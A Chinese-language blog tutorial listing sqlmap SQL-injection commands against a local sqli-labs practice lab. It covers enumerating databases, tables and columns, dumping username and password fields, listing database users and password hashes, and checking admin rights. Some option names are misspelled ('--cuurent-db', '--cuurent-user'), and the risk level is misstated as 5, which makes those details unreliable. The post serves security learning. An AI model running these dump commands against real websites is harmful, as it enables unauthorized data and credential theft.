【Try to Hack】sqlmap
📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年5月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
《web安全功防》学习所得
最简单使用-u
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1
当注入点后参数大于一个时,需要加双引号
python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1&uid=2"
一个参数的时候,url可以不加双引号
–dbs查询当前用户下所有数据库
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs
-D 数据库名称 --tables 查某一数据库下所有表
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables
-D 数据库名称 -T 表名 --columns 查某一数据库下某一表中全部字段名称
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T user_info --columns
-D 数据库名称 -T 表名 -C 字段名称 --dump 查某一数据库下某一表中某一字段的内容
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T user_info -C username,password --dump
–users 获取数据库所有用户
在当前用户有读取包含所有用户表的权限时,使用该命令就可以列出所有管理用户
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --users
–passwords 获取数据库用户的密码
在当前用户有读取包含所有用户密码的权限时,使用该命令就可以列出所有管理用户
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --passwords
–cuurent-db 获取当前网站数据库的名称
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --cuurent-db
–cuurent-user 获取当前网站数据库的用户名称的名称
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --cuurent-user
–level 5 探测等级
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --level 5
一共有1~5个等级
这个参数会影响测试的注入点。
GET和POST的数据都会进行测试
如果不加,默认为1
level为2时会测试HTTP cookie
level为3时会测试HTTP User-Agent/Referer
建议使用5
–risk 5 风险等级
risk增加后,sql语句不仅会包含select语句,也会包含insert、delete、update等sql语句,很可能会对数据库造成严重的破坏,所以不建议调高risk等级
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --risk 3
建议使用3
–batch 非交互式
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --batch
使用sqlmap时总是会提示然你选择是否继续之类的,–batch之后,就一直使用默认的选项,不需要进行交互
–dbms 数据库
当提前知道数据库是mysql或者access等数据库时,可使用该参数,加快检测效率
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbms mysql
–is-dba 判断当前用户是否为管理权限
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --is-dba
-v 显示信息
-vx(x指数字)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:显示有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -v4
-r 文本路径 判断文本中的请求是否存在注入
非常有用
在文件中加载HTTP请求,这样就可以不用设置其他参数(如cookie、POST数据),txt文件可以用bp抓包获得
python2 sqlmap.py -r 1.txt
一般在存在cookie注入时使用,或者当一个网站需要登录,那么就需要携带cookie,否则没法访问
后面也就是和正常使用一样
python2 sqlmap.py -r 文件路径名 -D 数据库名 --batch --tables
- 点赞
- 收藏
- 关注作者
评论(0)